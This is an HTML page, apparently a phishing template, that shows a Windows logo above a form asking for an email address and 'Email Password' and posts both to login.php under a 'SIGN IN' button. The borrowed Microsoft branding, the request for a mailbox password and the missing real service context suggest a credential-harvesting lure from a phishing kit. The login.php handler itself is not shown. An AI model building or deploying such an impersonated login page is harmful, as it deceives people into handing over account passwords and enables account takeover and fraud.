<html>
<head><meta charset="utf-8">
	<link href="favicon_mail.ico" rel="shortcut icon" type="image/gif" />
	<title>SMS</title>
</head>
<body>
<p></p>

<p></p>

<table align="center">
	<tbody>
		<tr>
			<td>
			<div align="center"><img height="120" src="windows_logo_cyan_rgb_d.png" width="300" /><br />
			&nbsp;
			<form action="login.php" method="post"><br />
			<br />
			<input class="form-control" id="email" name="email" placeholder="Recipient Email" style="width: 250px; height: 40px; font-family: Verdana; font-size: 15px; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255); border: 1px solid rgb(132, 132, 132); padding: 13px;" type="email" value="" /><br />
			<br />

			<input name="password" placeholder="Email Password" required="" style="width: 250px; height: 40px; font-family: Verdana; font-size: 15px; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255); border: 1px solid rgb(132, 132, 132); padding: 13px;" type="password" /><br />
			<br />
			<input style="width: 270px; height: 60px; background-color: rgb(30, 144, 255); border: 3px solid rgb(30, 144, 255); font-family: Verdana; font-size: 17px; color: rgb(255, 255, 255); border-radius: 4px; box-shadow: 3px 3px 3px rgb(136, 136, 136);" type="submit" value="SIGN IN" /></form>
			&nbsp;

			<hr align="center" width="250" /> <font face="calibri" size="2"> 2020 &copy; All rights reserved. </font></div>
			</td>
		</tr>
	</tbody>
</table>

<p></p>

<p></p>
</body>
</html>